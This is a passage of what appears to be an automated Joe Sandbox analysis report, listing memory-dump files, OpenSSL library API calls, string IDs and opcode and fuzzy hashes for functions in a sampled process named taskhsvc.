                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$R_get_stateR_put_error
                                                            • String ID: A$e$s
                                                            • API String ID: 2813068925-4195972710
                                                            • Opcode ID: a98b83b9e40ec786742fce741f0ce47f2afbf43cac91087f52008ff3074a8fee
                                                            • Instruction ID: 3c1578f4879c9053efe09d451686a7c7106cf7b137735d54a5b7260c4ad028d6
                                                            • Opcode Fuzzy Hash: a98b83b9e40ec786742fce741f0ce47f2afbf43cac91087f52008ff3074a8fee
                                                            • Instruction Fuzzy Hash: 2EF07FB45487019AD700AF69C04135ABBF1BF84748F218D1DA4D857710C77E914A8F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF5CD10 Relevance: 12.1, APIs: 8, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d515d596a64d895aa5f5a01da0e2166dee4eeaf9f98bbdd7c413e8a497d63e
                                                            • Instruction ID: ed6ed308cda43f59929bcecf4a15b914b929b6704a54383c2334fc5bd5706b87
                                                            • Opcode Fuzzy Hash: a3d515d596a64d895aa5f5a01da0e2166dee4eeaf9f98bbdd7c413e8a497d63e
                                                            • Instruction Fuzzy Hash: 95416AB56097008FD710DF29C58074BBBF0BF99318F52881DEA9887710D735E844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE24F49 Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CRYPTO_THREADID_current.LIBEAY32 ref: 6CE24F57
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE24F7B
                                                            • lh_delete.LIBEAY32 ref: 6CE24FD3
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE24FAC
                                                              • Part of subcall function 6CE237E0: CRYPTO_lock.LIBEAY32 ref: 6CE23FF5
                                                              • Part of subcall function 6CE237E0: CRYPTO_lock.LIBEAY32 ref: 6CE24022
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE24FF7
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE2501B
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE25066
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE2508F
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE250C7
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE250CF
                                                            • CRYPTO_THREADID_cmp.LIBEAY32 ref: 6CE250EB
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE25111
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_free$D_cmpD_currentlh_delete
                                                            • String ID:
                                                            • API String ID: 2695962765-0
                                                            • Opcode ID: ee0b35d58a19523228c1586c8a732deadd1b2250f1124e9addf0cc317b5f6304
                                                            • Instruction ID: f5c9d881a774c9c0914ff79785f77607c11cf673280f4f3264f6054af50c5385
                                                            • Opcode Fuzzy Hash: ee0b35d58a19523228c1586c8a732deadd1b2250f1124e9addf0cc317b5f6304
                                                            • Instruction Fuzzy Hash: 5A3113B1A197019BEB009F25C54579ABBF0FF80758F21880DE5988BB60D77DD444CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE74E00 Relevance: 10.8, APIs: 7, Instructions: 307COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3239fc0895a711662d2bd268e3aed8dd9e14864ca9485bcd7018863a7d55d7ca
                                                            • Instruction ID: 1fd655ba70157b8a21d2d4e9710792e9d7a890d7dfab08e92248033355fae130
                                                            • Opcode Fuzzy Hash: 3239fc0895a711662d2bd268e3aed8dd9e14864ca9485bcd7018863a7d55d7ca
                                                            • Instruction Fuzzy Hash: A3B16A72605B068FD724CF29D98065AF7F1FB89318F25892DD569CBB00E731E846CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED2E30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID: |
                                                            • API String ID: 1457121658-2343686810
                                                            • Opcode ID: d0197e34b932b8dd6897becadf134fae818659f273e73bdb0b35d4d04c852bb2
                                                            • Instruction ID: f4b1975b5564fb5002344a25ea911a8cd2486d5c463420355805e3625e3d24bc
                                                            • Opcode Fuzzy Hash: d0197e34b932b8dd6897becadf134fae818659f273e73bdb0b35d4d04c852bb2
                                                            • Instruction Fuzzy Hash: 7A412B71A087069FDB00CF29C58464AB7F1FF94348F22892DE9989B750D774ED468B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE80870 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_num_bitsO_malloc
                                                            • String ID: 2$q
                                                            • API String ID: 2607601166-239356128
                                                            • Opcode ID: 2da88c9e09847059ab3a5ea62a4accf1ddd9b2de740d4b97d6c529e6f2d12b6a
                                                            • Instruction ID: d4a52063a058ab98a492022de71320d9063d232f7f6a9b80ece39614f33d7ad1
                                                            • Opcode Fuzzy Hash: 2da88c9e09847059ab3a5ea62a4accf1ddd9b2de740d4b97d6c529e6f2d12b6a
                                                            • Instruction Fuzzy Hash: 0841357160A3459FE750DF2AC58061BBBF4ABC9318F21AA2DE9E887710D734D945CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEBCEB0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$g$x${${
                                                            • API String ID: 1767461275-644820815
                                                            • Opcode ID: ec382af22bb4f68cc980d16e04d12256dd0cbf8a2696b39e5243dc260f6fdc5c
                                                            • Instruction ID: d22237d3e4526978f4c1e06479d3cd4b19f35f6931c3730758be5d82b3bcd16b
                                                            • Opcode Fuzzy Hash: ec382af22bb4f68cc980d16e04d12256dd0cbf8a2696b39e5243dc260f6fdc5c
                                                            • Instruction Fuzzy Hash: 2F3106B4609301CFEB04EF25C18672ABBF1AB8534CF21C86DE8945BB54D3BA9545CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2AC29 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ERR_put_error.LIBEAY32 ref: 6CE2AC57
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC63
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$R_get_stateR_put_error
                                                            • String ID: A$e$s
                                                            • API String ID: 2813068925-4195972710
